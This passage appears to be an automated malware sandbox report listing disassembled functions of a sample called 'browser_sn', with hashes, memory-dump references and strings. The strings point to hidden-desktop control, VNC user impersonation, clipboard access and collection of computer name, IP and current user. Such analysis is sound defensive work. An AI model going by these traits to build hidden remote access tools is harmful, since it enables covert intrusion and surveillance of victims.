                                                                            • String ID: Global\$S:(ML;;NW;;;LW)$event_IN$event_IN_DONE$event_OUT$event_OUT_DONE$fm_IN$fm_OUT
                                                                            • API String ID: 1989023930-362996323
                                                                            • Opcode ID: 110fc2717108ebff6e53033f8ff6c374a8661c63bf5c686a461652ab7439fbc0
                                                                            • Instruction ID: ede89c90a4c309b74a3bc1113793412a710e8c80efd37bd549fb85153946bd51
                                                                            • Opcode Fuzzy Hash: 110fc2717108ebff6e53033f8ff6c374a8661c63bf5c686a461652ab7439fbc0
                                                                            • Instruction Fuzzy Hash: 8EB17D62608B8292EA94DF60E4917EA33B0FB89759F804131DF9D83B95DF7CE529C740
                                                                            Function 00007FF6C2B81AE0 Relevance: 36.2, APIs: 24, Instructions: 196clipboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Global$Clipboard$AvailableByteCharDataFormatLockMultiSizeUnlockWide$Open
                                                                            • String ID:
                                                                            • API String ID: 1939172783-0
                                                                            • Opcode ID: 92b57b9060b2f9a1b4901c51a30021d196aa55e373a880418b56e66cb62c40a1
                                                                            • Instruction ID: d43513098efebae7504b233e3b0e021c3268a0066f2801580d22a469b9876599
                                                                            • Opcode Fuzzy Hash: 92b57b9060b2f9a1b4901c51a30021d196aa55e373a880418b56e66cb62c40a1
                                                                            • Instruction Fuzzy Hash: C7815B21A09B4286E694EF16A91027973B0FF45B8AB044135DF9EC7791EF7CF424D700
                                                                            Function 00007FF6C2B8A910 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 122COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • HideDesktop.cpp : Retrieved SPI value for SPI_GETCLEARTYPE: 0x%08x, xrefs: 00007FF6C2B8AA4D
                                                                            • HideDesktop.cpp : Set SPI value for SPI_SETCLEARTYPE: 0x%08x, xrefs: 00007FF6C2B8AAE1
                                                                            • HideDesktop.cpp : Set SPI value for SPI_SETFONTSMOOTHING: 0x%08x, xrefs: 00007FF6C2B8AB3F
                                                                            • HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHING (0x%08x), xrefs: 00007FF6C2B8A94D
                                                                            • HideDesktop.cpp : Failed to get SPI value for SPI_GETCLEARTYPE (0x%08x), xrefs: 00007FF6C2B8AA26
                                                                            • HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHINGTYPE (0x%08x), xrefs: 00007FF6C2B8A9BB
                                                                            • HideDesktop.cpp : Failed to set SPI value for SPI_SETCLEARTYPE (0x%08x), xrefs: 00007FF6C2B8AAC1
                                                                            • HideDesktop.cpp : Failed to set SPI value for SPI_SETFONTSMOOTHING (0x%08x), xrefs: 00007FF6C2B8AB1D
                                                                            • HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHINGTYPE: 0x%08x, xrefs: 00007FF6C2B8A9E6
                                                                            • HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHING: 0x%08x, xrefs: 00007FF6C2B8A97B
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorInfoLastParametersSystem
                                                                            • String ID: HideDesktop.cpp : Failed to get SPI value for SPI_GETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHINGTYPE (0x%08x)$HideDesktop.cpp : Failed to set SPI value for SPI_SETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to set SPI value for SPI_SETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Retrieved SPI value for SPI_GETCLEARTYPE: 0x%08x$HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHING: 0x%08x$HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHINGTYPE: 0x%08x$HideDesktop.cpp : Set SPI value for SPI_SETCLEARTYPE: 0x%08x$HideDesktop.cpp : Set SPI value for SPI_SETFONTSMOOTHING: 0x%08x
                                                                            • API String ID: 2777246624-1480653996
                                                                            • Opcode ID: 2f3f2611d4a2bfd02228de316762cf01d85ca1b5bfadb3604ef3ee04cef68530
                                                                            • Instruction ID: f57359a591fc3cbb863e31cf6bb55788ed018a6b5eb91bbfa5d477f34e36bcfa
                                                                            • Opcode Fuzzy Hash: 2f3f2611d4a2bfd02228de316762cf01d85ca1b5bfadb3604ef3ee04cef68530
                                                                            • Instruction Fuzzy Hash: EC513C64E0C68785F7909FA5A940BB527A1AF6530EF805032CECDD37A1EEFCA549C391
                                                                            Function 00007FF6C2BAC2C0 Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 127COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - Call, xrefs: 00007FF6C2BAC2F4
                                                                            • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - 1, xrefs: 00007FF6C2BAC37E
                                                                            • g, xrefs: 00007FF6C2BAC31B
                                                                            • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - currentUser = %s, xrefs: 00007FF6C2BAC3DC
                                                                            • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - OpenProcessToken Error, xrefs: 00007FF6C2BAC43D
                                                                            • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - ImpersonateLoggedOnUser Failed, xrefs: 00007FF6C2BAC455
                                                                            • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - WSLocked, xrefs: 00007FF6C2BAC3A7
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CriticalSection$Leave$Enter
                                                                            • String ID: g$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - 1$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - Call$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - ImpersonateLoggedOnUser Failed$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - OpenProcessToken Error$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - WSLocked$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - currentUser = %s
                                                                            • API String ID: 2978645861-1267036565
                                                                            • Opcode ID: bdb4852c987baf4b60644aebab38a863e7ba7580bc742476bcdc9009847be20c
                                                                            • Instruction ID: e7bd779577f37a77931b7394a8d887ec02b83100e6c24e52415643a2a7e4af6d
                                                                            • Opcode Fuzzy Hash: bdb4852c987baf4b60644aebab38a863e7ba7580bc742476bcdc9009847be20c
                                                                            • Instruction Fuzzy Hash: 1D513025A1C68285E790DF61A8546F933A1EF8AB9EF484032DECEC2391DFBDE405C744
                                                                            Function 00007FF6C2BA8A70 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 220COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: DeleteObjectRectfree$CombineCreateCriticalEventSection$EnterErrorFreeHeapLastLeave_errnomalloc
                                                                            • String ID: \$vncclient.cpp : FATAL! client update region is empty!
                                                                            • API String ID: 1264956880-3227535004
                                                                            • Opcode ID: 23a49fa5f1be814596b27dce1756cea377cd1ca12dee1e05d8a6d5d454cb436e
                                                                            • Instruction ID: 12a2556e38a8bd4cdced344d67920a16d4d4a4818d3b3e4c68a401aeee41633f
                                                                            • Opcode Fuzzy Hash: 23a49fa5f1be814596b27dce1756cea377cd1ca12dee1e05d8a6d5d454cb436e
                                                                            • Instruction Fuzzy Hash: B3A1E7326546968AD780DF16E844AAA77B8FB89B89F415036EF8E83750CF7DD805CB40
                                                                            Function 00007FF6C2B87BA6 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 239COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                            • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (IA64 Processor)$Current user :
                                                                            • API String ID: 171970310-1812746349
                                                                            • Opcode ID: 86bfd3a467f30a8a258fb3e85ac81f233c0839e1a4daaf24cbd739d77d4b70d4
                                                                            • Instruction ID: 76667b028b553d64a846b4cf2961bfb1346de6dc999213fb65b54cf5ce937e95
                                                                            • Opcode Fuzzy Hash: 86bfd3a467f30a8a258fb3e85ac81f233c0839e1a4daaf24cbd739d77d4b70d4
                                                                            • Instruction Fuzzy Hash: 55B1AF65A0868295EB60CF3598402B937A0FB057BDF504336EABEC7BD5DEACE515C310
                                                                            Function 00007FF6C2B87B37 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 239COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                            • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Alpha64 Processor)$Current user :
                                                                            • API String ID: 171970310-1760265636
                                                                            • Opcode ID: 8896173faf4fc177a5d62b3271f1ef0a6d32a223d2c10bc8d06557924221250b
                                                                            • Instruction ID: 5e48bb2aa312199908231e958fec24a5dd07a6f60461c23f29ce23253cfe2c0b
                                                                            • Opcode Fuzzy Hash: 8896173faf4fc177a5d62b3271f1ef0a6d32a223d2c10bc8d06557924221250b
                                                                            • Instruction Fuzzy Hash: 42B1AE25A0868295EBA0CF3598402B937A0FB057BDF504336EABEC7BD5DEACE515C310
                                                                            Function 00007FF6C2B87A1C Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 239COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                            • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (MSIL Processor)$Current user :
                                                                            • API String ID: 171970310-1756215141
                                                                            • Opcode ID: e292ff1ab8a2ec860fca5fdae839fd5dac6431b32c19bd64026a63d2d728b1e0
                                                                            • Instruction ID: 46aa7f25780b9003d7ff6d42d6eea2070a3cfb9b028b1b070b75a3f6bc30d731
                                                                            • Opcode Fuzzy Hash: e292ff1ab8a2ec860fca5fdae839fd5dac6431b32c19bd64026a63d2d728b1e0
                                                                            • Instruction Fuzzy Hash: 7DB1BF65A08A8285EB60CF3598402B937A0FB057BDF504336EABEC7BD5DEACE515C310
                                                                            Function 00007FF6C2B87A5B Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 239COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                            • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (MIPS Processor)$Current user :
                                                                            • API String ID: 171970310-18614430
                                                                            • Opcode ID: 13559806fcd846485afb22cc621461796e5ecc486d2cf5f10f95b5e9e7543de7
                                                                            • Instruction ID: 1ef005e9bbcbfc67bfcd2763b6cf5a7fb40b24858f2725e00c5c846b54de132c
                                                                            • Opcode Fuzzy Hash: 13559806fcd846485afb22cc621461796e5ecc486d2cf5f10f95b5e9e7543de7
                                                                            • Instruction Fuzzy Hash: A1B1AF25A08A8695EB60CF3598402B937A0FB057BDF504336EABEC7BD5DEACE515C310
                                                                            Function 00007FF6C2B87BE2 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                            • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (AMD64 Processor)$Current user :
                                                                            • API String ID: 171970310-4243357635
                                                                            • Opcode ID: 03aacd0ad6e6d9707dfc08155cf451b10a2e0ac72c3257671f52e65d8e606d50
                                                                            • Instruction ID: 64282d007832174a361abc292610b4d8bc216dbe6cebe76e82727b8b5f161ba5
                                                                            • Opcode Fuzzy Hash: 03aacd0ad6e6d9707dfc08155cf451b10a2e0ac72c3257671f52e65d8e606d50
                                                                            • Instruction Fuzzy Hash: 7EB1BF25A08A8285EB60CF3598402B937A0FB057BDF504336EABEC7BD5DEACE505C310
                                                                            Function 00007FF6C2B87B71 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2D08000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2D41000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DB4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679596597.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_23_2_7ff6c2b80000_browser_sn.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                            • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (PPC Processor)$Current user :
                                                                            • API String ID: 171970310-3099718995
                                                                            • Opcode ID: 6c4329df222d5528f2f071fd5f1073a2ca0bc00249f98637d5c349aac7834982
                                                                            • Instruction ID: abfb3f56892e6c167dde92896338b7a26d77d44b3086769fd7e4303351643a0b
                                                                            • Opcode Fuzzy Hash: 6c4329df222d5528f2f071fd5f1073a2ca0bc00249f98637d5c349aac7834982
                                                                            • Instruction Fuzzy Hash: BDB1AF25A08A8695EB60CF3598402B937A0FB057BDF504336EABEC7BD5DEACE505C310
                                                                            Function 00007FF6C2B879E9 Relevance: 30.0, APIs: 9, Strings: 8, Instructions: 237COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000017.00000002.1679207078.00007FF6C2B81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6C2B80000, based on PE: true
                                                                            • Associated: 00000017.00000002.1679174489.00007FF6C2B80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679376376.00007FF6C2C8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679451547.00007FF6C2C8F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2C90000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000017.00000002.1679495619.00007FF6C2CDB000.00000004.00000001.01000000.00000007.sdmpDownload File
